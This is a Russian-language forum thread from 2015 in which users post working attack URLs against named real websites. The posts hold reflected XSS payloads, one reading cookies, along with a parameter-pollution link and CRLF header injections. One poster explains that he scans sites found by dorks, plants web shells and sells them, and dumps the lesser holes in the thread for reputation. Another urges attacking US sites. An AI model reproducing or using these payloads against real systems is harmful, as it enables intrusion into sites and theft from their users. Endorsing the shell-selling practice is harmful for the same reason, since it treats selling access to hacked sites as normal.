ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.07.2015, 12:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
XSS-reflected:
Код:
Code:
http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.lastmodified%29%3C/ScRiPt%3E
|
|
|
|
10.07.2015, 12:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от Filipp
Filipp said:
↑
XSS:
Код:
Code:
http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.lastmodified%29%3C/ScRiPt%3E
Сканером что ли каким то шел? или фазил?
|
|
|
|
10.07.2015, 19:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от frank
frank said:
↑
Сканером что ли каким то шел? или фазил? Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.
|
|
|
|
10.07.2015, 19:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от Fipp
Fipp said:
↑
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю. Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
Кстати, в вашем примере ксс очень условная.
1. Она есть даже при обычной записи alert(1)
2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.
|
|
|
|
10.07.2015, 21:42
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от Filipp
Filipp said:
↑
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю. Да и вообще, какой прикол по РУ работать, давай по USA лучше
|
|
|
10.07.2015, 23:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от frank
frank said:
↑
Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
Кстати, в вашем примере ксс очень условная.
1. Она есть даже при обычной записи alert(1)
2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет. Сканер влепил так, я запрос скопировал и запостил. А профит прост как пять пальцев, выбираю сайты, сканю их, в некоторые заливаю шеллы и продаю. А где нет ничего серьезного, там XSS или SQLi от которых толку особо нет я закидываю сюда) Тут они кому то пригодяться да и я репы получу.
Сообщение от EoGeneo
EoGeneo said:
↑
Да и вообще, какой прикол по РУ работать, давай по USA лучше Шеллы покупают, не уверен что кто-то будет брать USA шелл, покрайней мере, надо будет искать покупателя и скорее всего он не надежный. Конечно есть гарант для таких дел, но я все же придерживаюсь классики)
|
|
|
|
11.07.2015, 22:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
XSS-reflected:
Код:
Code:
http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
HTTP Parametr Pollution (Original Link):
Код:
Code:
http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549?TAGS=vse-bukety&CODE=otkrytka-vintazhnaya-011&n950821=v972549
Exploit:
Код:
Code:
http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549
CRLF-inj:
Код:
Code:
POST mh-proxy.ru/blog/action.php
POST-DATA: id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
Код:
Code:
http://guru.ua/
Cookie: user_set_city=%0D%0A%20SomeCustomInjectedHeader:injected_by_ANTICHAT
Код:
Code:
POST topclub.ua/
POST DATA: ACT=45&business=1&comment=1&email=sample%40email.tst&form_name=%d0%97%d0%b0%d1%8f%d0%b2%d0%ba%d0%b0%20%d0%bd%d0%b0%20%d0%bf%d1%80%d0%be%d0%b4%d0%b2%d0%b8%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5%20%d0%b7%d0%b0%d0%b2%d0%b5%d0%b4%d0%b5%d0%bd%d0%b8%d1%8f&name=hsmryamv¶ms_id=81288&phone=555-666-0606&position=1&redirect_on_duplicate=&RET=http://topclub.ua/pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&return=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT&site_id=1&status=open&submit=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c%20%d0%b7%d0%b0%d1%8f%d0%b2%d0%ba%d1%83&town=1&URI=pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&XID=
|
|
|
|
26.07.2015, 22:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
XSS:
Код:
Code:
http://lifetosex.com.ua/tags?tags=%25D0%25A1%25D0%25B5%25D0%25BA%25D1%2581%2520-%2520%25D0%259A%25D0%25BB%25D0%25B0%25D1%2581%25D1%2581%25D0%25B8%25D0%25BA%25D0%25B0%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert%281%29%22%3E&tag_list_start=36
|
|
|
|
27.07.2015, 16:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
XSS-reflected:
Код:
Code:
http://otsos.info/aubox.php?callback=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22For%20Antichat%22%29%3C/ScRiPt%3E&_=1438000881938
XSS-reflected:
Код:
Code:
http://kofe-spb.ru/feedback.php?complaint=170%3C/textarea%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E
XSS-reflected:
Код:
Code:
http://sexytales.org/stories/drama/?ecid[]=42&necid[]=42&order_by=-part_count%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E&period=&per_page=
|
|
|
|
28.07.2015, 10:30
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
интересная XSS:
Код:
Code:
http://www.fas.harvard.edu/antichat=%3Cscript%3Ealert%28/antichat/%29;%3C/script%3E%00
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
